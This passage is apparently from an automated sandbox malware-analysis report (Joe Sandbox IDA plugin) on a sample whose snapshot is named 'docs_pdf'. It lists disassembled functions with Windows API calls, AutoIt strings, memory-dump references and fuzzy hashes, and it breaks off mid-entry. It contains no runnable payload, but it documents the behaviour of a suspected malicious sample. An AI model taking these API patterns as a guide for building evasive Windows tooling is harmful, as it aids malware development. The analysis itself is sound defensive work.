                                                            • Opcode Fuzzy Hash: 8bae369296804efe4d88ea9248582fe06374b5272cbc5fab703319b61d8182f5
                                                            • Instruction Fuzzy Hash: 40F0BE31000219FBDB122F50AC09FCE3FAAAF15310F148008FA19215E2877909E2CBD5
                                                            Function 0014A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0014A399
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0014A3AC
                                                            • GetCurrentThreadId.KERNEL32 ref: 0014A3B3
                                                            • AttachThreadInput.USER32(00000000), ref: 0014A3BA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 2710830443-0
                                                            • Opcode ID: bf185ff5ba88d07409e7c89fc113db9874ad2930c3eddbc55632311f86577568
                                                            • Instruction ID: bb26f1707ffe8cf39bb9bb99bda2d9dc9bfa1fff27fb0d1bf23f3c07cece2a8c
                                                            • Opcode Fuzzy Hash: bf185ff5ba88d07409e7c89fc113db9874ad2930c3eddbc55632311f86577568
                                                            • Instruction Fuzzy Hash: 25E03931585228BADB201FA2DC0CED73F6CFF167A1F408028F50C84460D77185C1CBA0
                                                            Function 000F2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSysColor.USER32(00000008), ref: 000F2231
                                                            • SetTextColor.GDI32(?,000000FF), ref: 000F223B
                                                            • SetBkMode.GDI32(?,00000001), ref: 000F2250
                                                            • GetStockObject.GDI32(00000005), ref: 000F2258
                                                            • GetWindowDC.USER32(?,00000000), ref: 0012C0D3
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0012C0E0
                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0012C0F9
                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0012C112
                                                            • GetPixel.GDI32(00000000,?,?), ref: 0012C132
                                                            • ReleaseDC.USER32(?,00000000), ref: 0012C13D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                            • String ID:
                                                            • API String ID: 1946975507-0
                                                            • Opcode ID: 327f3bb2592a6484fa233c90214bb1ddee61fb0957b29f7f3b5f5c35add50d5c
                                                            • Instruction ID: d072e48a8cba44ea0bf23d1955c86ef634d1ecbf2095e5b969673bb755de9af4
                                                            • Opcode Fuzzy Hash: 327f3bb2592a6484fa233c90214bb1ddee61fb0957b29f7f3b5f5c35add50d5c
                                                            • Instruction Fuzzy Hash: 23E03932204244EADB215F64FC097D93B20EB15332F04836AFB6D884E1877149D1DB51
                                                            Function 00148C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentThread.KERNEL32 ref: 00148C63
                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,0014882E), ref: 00148C6A
                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0014882E), ref: 00148C77
                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,0014882E), ref: 00148C7E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CurrentOpenProcessThreadToken
                                                            • String ID:
                                                            • API String ID: 3974789173-0
                                                            • Opcode ID: a0c80034a09c8a73ce2ae19a127736654db3f4e534f9db8bf25b76a1a74c6a13
                                                            • Instruction ID: a950ae36652e7ca150ed769b939f2e29d6826401dc68ba2da6619565240d7a33
                                                            • Opcode Fuzzy Hash: a0c80034a09c8a73ce2ae19a127736654db3f4e534f9db8bf25b76a1a74c6a13
                                                            • Instruction Fuzzy Hash: C2E08636642211DBD7205FB06D0CB9B3BBCFF507A2F14482CB249CA450DB3484C2CB61
                                                            Function 00132187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDesktopWindow.USER32 ref: 00132187
                                                            • GetDC.USER32(00000000), ref: 00132191
                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001321B1
                                                            • ReleaseDC.USER32(?), ref: 001321D2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                            • String ID:
                                                            • API String ID: 2889604237-0
                                                            • Opcode ID: 471ef2c766f7d6b95e4f9d8c3a62d7dcd979b19043e20a97c768a7e26ddb16d6
                                                            • Instruction ID: e4e4aaad813f1b1f250758dad08d04ef29a0439bdf371a73e8c770e0eda4b9e3
                                                            • Opcode Fuzzy Hash: 471ef2c766f7d6b95e4f9d8c3a62d7dcd979b19043e20a97c768a7e26ddb16d6
                                                            • Instruction Fuzzy Hash: A3E01A75808208EFDB01AF60C908AAE7BF2FF4C350F118429F95AD7660CB3881C2AF40
                                                            Function 0013219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDesktopWindow.USER32 ref: 0013219B
                                                            • GetDC.USER32(00000000), ref: 001321A5
                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001321B1
                                                            • ReleaseDC.USER32(?), ref: 001321D2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                            • String ID:
                                                            • API String ID: 2889604237-0
                                                            • Opcode ID: 4fce9986a283a79957f7530c4b57ec77a1204336bb5afca2dabfa28a5b3bd383
                                                            • Instruction ID: b5bda6d31a5e757ef7c8191b11d893db15294075a7cb075022678c960aa1a315
                                                            • Opcode Fuzzy Hash: 4fce9986a283a79957f7530c4b57ec77a1204336bb5afca2dabfa28a5b3bd383
                                                            • Instruction Fuzzy Hash: 76E0E575808208AFCB119F60C8086AE7BB2AB4C310F108029F95A97660CB3891C29F40
                                                            Function 0014B7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 0014B981
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ContainedObject
                                                            • String ID: AutoIt3GUI$Container
                                                            • API String ID: 3565006973-3941886329
                                                            • Opcode ID: 14496e95dc1ea360f7dd752e2d3c9545a6404e31227f624eaf1b50098ca1ec63
                                                            • Instruction ID: 52d3e42347d0e29aedc38d4c808170b4eec57d83e7ed7d081d7a4eee1978fc79
                                                            • Opcode Fuzzy Hash: 14496e95dc1ea360f7dd752e2d3c9545a6404e31227f624eaf1b50098ca1ec63
                                                            • Instruction Fuzzy Hash: 16915C746042019FDB24DF68C885A66B7F9FF49710F24856DF949CB6A1DB70E841CB50
                                                            Function 0015B217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0010FEC6: _wcscpy.LIBCMT ref: 0010FEE9
                                                              • Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
                                                              • Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C
                                                            • __wcsnicmp.LIBCMT ref: 0015B298
                                                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0015B361
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                            • String ID: LPT
                                                            • API String ID: 3222508074-1350329615
                                                            • Opcode ID: 05a70e5a771f26039154a51db7e226f7abff11d975143e6de76d4ce839406e87
                                                            • Instruction ID: 6a98e520bc5b61f5caef9372835f07ec989e18121327c042d2aa56b6e72c8df2
                                                            • Opcode Fuzzy Hash: 05a70e5a771f26039154a51db7e226f7abff11d975143e6de76d4ce839406e87
                                                            • Instruction Fuzzy Hash: 09617275A04219EFCB18DF98C885EFEB7B4BF08311F114069F956AB291DB70AE44CB90
                                                            Function 00102AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNEL32(00000000), ref: 00102AC8
                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00102AE1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemorySleepStatus
                                                            • String ID: @
                                                            • API String ID: 2783356886-2766056989
                                                            • Opcode ID: 6bb0dfba47599dafaef129d2c1b4c4f07749458c360c1cba8cb35e093b3f29b8
                                                            • Instruction ID: c765726d394248d933095a48b48e8c6fd72fe4f3600c537e539fdffcf0096221
                                                            • Opcode Fuzzy Hash: 6bb0dfba47599dafaef129d2c1b4c4f07749458c360c1cba8cb35e093b3f29b8
                                                            • Instruction Fuzzy Hash: 365146714187489BD320AF14D886BABBBF8FF84310F82885DF2D9511A2DB318569CB66
                                                            Function 001599BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F506B: __fread_nolock.LIBCMT ref: 000F5089
                                                            • _wcscmp.LIBCMT ref: 00159AAE
                                                            • _wcscmp.LIBCMT ref: 00159AC1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _wcscmp$__fread_nolock
                                                            • String ID: FILE
                                                            • API String ID: 4029003684-3121273764
                                                            • Opcode ID: 9581492b6cc434bbe39c67b508a7919eed1867e9cc8c3510a5aacfdda6348e99
                                                            • Instruction ID: 1b9e638e61363b1431fd9266cd782ea5a5bca8b4547f622f93593ff18d8cba2a
                                                            • Opcode Fuzzy Hash: 9581492b6cc434bbe39c67b508a7919eed1867e9cc8c3510a5aacfdda6348e99
                                                            • Instruction Fuzzy Hash: BE41D771A00619FADF209EA4DC45FEFB7BDEF45711F000079FA10AB182DB759A0497A1
                                                            Function 00162882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00162892
                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 001628C8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CrackInternet_memset
                                                            • String ID: |
                                                            • API String ID: 1413715105-2343686810
                                                            • Opcode ID: 66f0f032e951c0133ec569b4018ca68b2c4bb81a9c7745bfae17c11c3779aebf
                                                            • Instruction ID: 0c6e01fcc6b464a6b4e2202aa8c07e4f03fc3f03acffed6984037b6d885e5e58
                                                            • Opcode Fuzzy Hash: 66f0f032e951c0133ec569b4018ca68b2c4bb81a9c7745bfae17c11c3779aebf
                                                            • Instruction Fuzzy Hash: 5F313A71800119AFDF05EFA1CC85EEEBFB9FF08340F10402AF919A6166DB355A56DBA1
                                                            Function 00176CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DestroyWindow.USER32(?,?,?,?), ref: 00176D86
                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00176DC2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$DestroyMove
                                                            • String ID: static
                                                            • API String ID: 2139405536-2160076837
                                                            • Opcode ID: 5c38811a9abd5d9c5364feafa0b68097b88bcd793ef0877978f355ce95aa41ee
                                                            • Instruction ID: 7887609ed569f79ffbe9eb44214a13a50f92324dd43ccfcd64c7f4a6d5e0823d
                                                            • Opcode Fuzzy Hash: 5c38811a9abd5d9c5364feafa0b68097b88bcd793ef0877978f355ce95aa41ee
                                                            • Instruction Fuzzy Hash: 02317C71210608AEDB209F68CC80BFB77B9FF48724F108619F9A997190DB31AC91DB60
                                                            Function 00152D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00152E00
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00152E3B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu_memset
                                                            • String ID: 0
                                                            • API String ID: 2223754486-4108050209
                                                            • Opcode ID: 82b1129352f45fff4c3dd82dccaa3332961e8cc9bfc473e6e024c705044510c8
                                                            • Instruction ID: 43162628f2c50b15f726114a420ee089f9137f524b2c20dfcd0d74734d2eb3db
                                                            • Opcode Fuzzy Hash: 82b1129352f45fff4c3dd82dccaa3332961e8cc9bfc473e6e024c705044510c8
                                                            • Instruction Fuzzy Hash: EF31D733A00305EBEB288F58D8867DEBBB9EF06351F140469EDA59A1A0D7709D89CB50
                                                            Function 00176943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 001769D0
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001769DB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: Combobox
                                                            • API String ID: 3850602802-2096851135
                                                            • Opcode ID: 8c19628f1cdb95f683c7803ae5e035452a91f17f11b36a197d0aad0d304af830
                                                            • Instruction ID: 80e41902b0373ce9cc0d4858a8443716273227bd14e82206eeb8e135485bd130
                                                            • Opcode Fuzzy Hash: 8c19628f1cdb95f683c7803ae5e035452a91f17f11b36a197d0aad0d304af830
                                                            • Instruction Fuzzy Hash: A811C471700609AFEF119F14CC90EFB377AEB993A8F118124FA5C97291D7759C9187A0
                                                            Function 00176E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000F1D73
                                                              • Part of subcall function 000F1D35: GetStockObject.GDI32(00000011), ref: 000F1D87
                                                              • Part of subcall function 000F1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 000F1D91
                                                            • GetWindowRect.USER32(00000000,?), ref: 00176EE0
                                                            • GetSysColor.USER32(00000012), ref: 00176EFA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                            • String ID: static
                                                            • API String ID: 1983116058-2160076837
                                                            • Opcode ID: a425c06879a737308b675ba02efa151c6d1666da6d8061128646bc0b1dbe71f3
                                                            • Instruction ID: 2335e6cc4feb8b24d98760adea1598464a1c3323c32b43c374e7475f176e3ed4
                                                            • Opcode Fuzzy Hash: a425c06879a737308b675ba02efa151c6d1666da6d8061128646bc0b1dbe71f3
                                                            • Instruction Fuzzy Hash: 81213D72514609AFDB04DFA8DD45AFA7BB8FB08314F044629FD59E3250D734E851DB60
                                                            Function 00176B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowTextLengthW.USER32(00000000), ref: 00176C11
                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00176C20
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: LengthMessageSendTextWindow
                                                            • String ID: edit
                                                            • API String ID: 2978978980-2167791130
                                                            • Opcode ID: 1e8c8839cc6bd0f69d681637b58a16f66603821228ae67c16d2ce7ab4603174b
                                                            • Instruction ID: 2b01d0ee6f4be950b0ac3877b4012fd9609ce0dcbf7db91a1b0220994c52386e
                                                            • Opcode Fuzzy Hash: 1e8c8839cc6bd0f69d681637b58a16f66603821228ae67c16d2ce7ab4603174b
                                                            • Instruction Fuzzy Hash: 09118C71600608ABEB118E64DC41AFB3779EB15378F608728F969D71E0C775DC919B60
                                                            Function 00152E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00152F11
                                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00152F30
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu_memset
                                                            • String ID: 0
                                                            • API String ID: 2223754486-4108050209
                                                            • Opcode ID: 68e019cf5bfbe79f6d2d6672990d62335f8d5e2ad6f3715cd3db94ee73b898f5
                                                            • Instruction ID: b023e5c11b42b9edd9454251bded2bcf7f6ae59436f93855bc42365f81d6d5a1
                                                            • Opcode Fuzzy Hash: 68e019cf5bfbe79f6d2d6672990d62335f8d5e2ad6f3715cd3db94ee73b898f5
                                                            • Instruction Fuzzy Hash: C911B233901214EBDB24DB58EC45B9D77B9EB17311F1501B6EC64AB2A0D7B0AD48C7D1
                                                            Function 001624CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                            Download Yara Rule
                                                            APIs
